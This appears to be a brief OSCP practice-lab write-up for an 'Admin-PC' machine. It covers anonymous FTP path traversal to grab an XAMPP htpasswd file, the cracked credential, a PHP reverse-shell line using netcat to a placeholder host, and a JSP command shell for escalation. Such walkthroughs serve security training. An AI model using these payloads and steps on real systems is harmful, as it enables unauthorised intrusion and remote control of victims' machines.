OSCP Admin-PC machine write-up
OSCP Admin-pc machine write-up
Exploitation
OSCP Admin-pc machine write-up
Scan the machine using oscp
nmap 192.168.x.55 -A
One interesting part is the ftp service output oscp
21/tcp open ftp syn-ack ttl 128 | fingerprint-strings: | GenericLines: | 220-Wellcome to Home Ftp Server! | Server ready. | command not understood. | command not understood. | Help: | 220-Wellcome to Home Ftp Server! | Server ready. | 'HELP': command not understood. | NULL, SMBProgNeg: | 220-Wellcome to Home Ftp Server! |_ Server ready. | ftp-anon: Anonymous FTP login allowed (FTP code 230) | drw-rw-rw- 1 ftp ftp 0 Dec 28 2015 . [NSE: writeable] |_drw-rw-rw- 1 ftp ftp 0 Dec 28 2015 .. [NSE: writeable]
Connect to the server and get the Xampp config file
Use user anonymous with any password oscp
[root:~/Desktop]# ftp ftp> o (to) 192.168.x.55 Connected to 192.168.x.55. 220-Wellcome to Home Ftp Server! 220 Server ready. Name (192.168.x.55:root): anonymous 331 Password required for anonymous. Password: 230 User Anonymous logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> get ../xampp/security/webdav.htpasswd local: ../xampp/security/webdav.htpasswd remote: ../xampp/security/webdav.htpasswd 200 Port command successful. 150 Opening data connection for ../xampp/security/webdav.htpasswd. 226 File sent ok
the file contains the credentials
fm:$apr1$yT3K79by$RbmkKdKGdaXs80zPCIZnR1
Crack the password, you will get the plaintext
fm:x-files
Now connect to
192.168.x.55:10433/admin
which is file manager allowing executable files
upload netcat.exe and then upload PHP file including system(‘nc –vv YOUR_HOST 443 –e cmd.exe’); to gain shell access
Escalation
Upload jsp shell file to c:/xampp/tomcat/webapps/examples
then browse it using 192.168.x.55:10433/examples/cmd.jsp?cmd=whoami
And you’re an admin
More infomation about OSCP Write-Up click here